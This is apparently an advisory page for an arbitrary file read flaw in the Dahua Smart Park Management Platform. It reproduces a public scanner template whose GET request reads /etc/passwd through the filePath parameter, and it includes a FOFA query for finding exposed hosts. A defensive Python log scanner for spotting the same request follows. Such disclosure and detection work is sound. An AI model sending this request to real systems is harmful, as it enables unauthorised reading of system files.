dahua-wpms-lfi: Dahua Smart Park Management Platform - Arbitrary File Read

Date: 2025-08-01 | Affected software: Dahua Smart Park Management Platform | PoC: public

Vulnerability description

Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.

PoC code [public]

id: dahua-wpms-lfi

info:
  name: Dahua Smart Park Management Platform - Arbitary File Read
  author: DhiyaneshDk
  severity: high
  description: Dahua Smart Park Management Platform is vulnerable to Local File Inclusion.
  reference:
    - https://mp.weixin.qq.com/s/uRhVl2XC5fTNKO8eDFFebA
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua_zhyq_attachment_fileread.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
  tags: lfi,dahua,wpms,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename=passwd

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220198d6d46010fbe3377efa3e10399986707a58b88574b18e3624e758586d821f302203d3a8d98d05ea10fa477719b9e76e4af0bfcd8f39c0c7146ce8ba66de5cd0af7:922c64590222798bb761d5b6d8e72950
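
For defenders, the request shape in the template above can be searched for in web access logs. The following is an added example, not part of the original template or the vendor's code; it assumes a combined/common access log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter from the template's request path.
ENDPOINT = "/portal/itc/attachment_downloadbyurlatt.action"
PARAM = "filepath"
# Assumption: combined/common log format with a quoted request line.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def normalise(value, rounds=3):
    """Percent-decode until stable so encoded values compare equal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip().lower()

def classify(line):
    """Return a finding dict for a request that passes a file: URL, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Drop ;jsessionid-style path parameters before comparing.
    if normalise(parts.path).split(";", 1)[0] != ENDPOINT:
        return None
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() != PARAM:
            continue
        for value in values:
            v = normalise(value)
            if v.startswith("file:"):
                # 200 matches the template's status matcher: content was likely served.
                return {"value": v, "served": m.group("status") == "200"}
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd HTTP/1.1" 200 1820',
    '192.0.2.11 - - [01/Aug/2025:10:00:05 +0000] "GET /portal/itc/attachment_downloadByUrlAtt.action?filePath=file%3A%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    '192.0.2.12 - - [01/Aug/2025:10:01:00 +0000] "GET /portal/itc/attachment_downloadByUrlAtt.action?filePath=upload/report.pdf HTTP/1.1" 200 5120',
    '192.0.2.13 - - [01/Aug/2025:10:02:00 +0000] "GET /WPMS/asset/common/js/jsencrypt.min.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `served` set to true corresponds to the template's 200 status matcher and warrants checking the response headers and body for that request.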